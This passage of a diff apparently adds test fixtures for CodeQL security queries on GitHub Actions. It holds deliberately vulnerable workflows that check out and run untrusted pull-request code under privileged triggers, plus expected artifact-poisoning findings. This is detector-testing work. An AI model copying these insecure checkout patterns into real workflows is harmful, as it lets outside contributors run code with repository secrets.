+1,32 @@ +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + test2: + runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml new file mode 100644 index 000000000000..47a0dfc6bd34 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -0,0 +1,19 @@ +on: issue_comment + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Get PR number + id: pr_number + if: github.event_name == 'issue_comment' && github.repository_owner == 'foo' + run: | + PR_URL="${{ github.event.issue.pull_request.url }}" + PR_NUMBER=${PR_URL##*/} + echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT + - name: Checkout Pull Request + if: github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml new file mode 100644 index 000000000000..0a38be8b12be --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -0,0 +1,13 @@ +name: Test +on: + + workflow_run: + workflows: [Trigger] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/dangerous-git-checkout + - run: yarn test diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml new file mode 100644 index 000000000000..7e154502c139 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -0,0 +1,51 @@ +on: + issue_comment: + types: [created, edited] + +jobs: + build: + if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') + runs-on: ubuntu-latest + + steps: + - name: Get PR details + uses: actions/github-script@v6 + id: get-pr + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + try { + const result = await github.rest.pulls.get(request) + return result.data + } catch (err) { + core.setFailed(`Request failed with error ${err}`) + } + + - name: Checkout PR + uses: actions/checkout@v3 + with: + repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} + ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} + + - name: Update version minor + if: contains(github.event.comment.body, '/version minor') + run: | + ./version.sh -u -n + echo "BUMP_TYPE=minor" >> $GITHUB_ENV + + - name: Update version major + if: contains(github.event.comment.body, '/version major') + run: | + ./version.sh -u -m + echo "BUMP_TYPE=major" >> $GITHUB_ENV + + - name: Update version patch + if: contains(github.event.comment.body, '/version patch') + run: | + ./version.sh -u -p + echo "BUMP_TYPE=patch" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml new file mode 100644 index 000000000000..b98d76549986 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml new file mode 100644 index 000000000000..037a0eb79f95 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.pull_request.head.repo.full_name == github.repository + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml new file mode 100644 index 000000000000..c802355d102a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml new file mode 100644 index 000000000000..bcde60f55cb8 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml new file mode 100644 index 000000000000..55aa0b41c6c7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected new file mode 100644 index 000000000000..aa0057d60a1b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -0,0 +1,71 @@ +edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | +nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | +subpaths +#select +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref new file mode 100644 index 000000000000..4f8d2af04e8d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected new file mode 100644 index 000000000000..09aed9e34a10 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -0,0 +1,54 @@ +edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | +nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho 